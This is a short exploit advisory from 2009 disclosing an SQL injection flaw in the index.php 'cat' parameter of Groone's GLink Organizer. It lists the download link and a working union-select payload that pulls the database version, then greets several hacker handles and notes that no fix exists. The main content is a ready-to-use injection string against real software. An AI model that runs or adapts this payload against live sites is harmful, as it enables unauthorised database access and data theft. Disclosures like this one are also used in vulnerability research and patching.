Groone's GLink Organizer (index.php cat) SQL Injection Vulnerability

2009-01-26 09:44:01

#Groone's GLink Organizer (index.php) SQL Injection Vulnerability


#Author: nuclear


#download:
http://www.groonesworld.com/programs/glinks/glinks.zip


#vuln:
http://localhost/[path]/index.php?cat=-1 union select 1,@@version,3 %23


#greetz Mi4night, cAs, zYzTeM, THE_MAN, Pepe, I-O-W-A,Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar

#

Fixes

No fixes

In order to submit a new fix you need to be registered.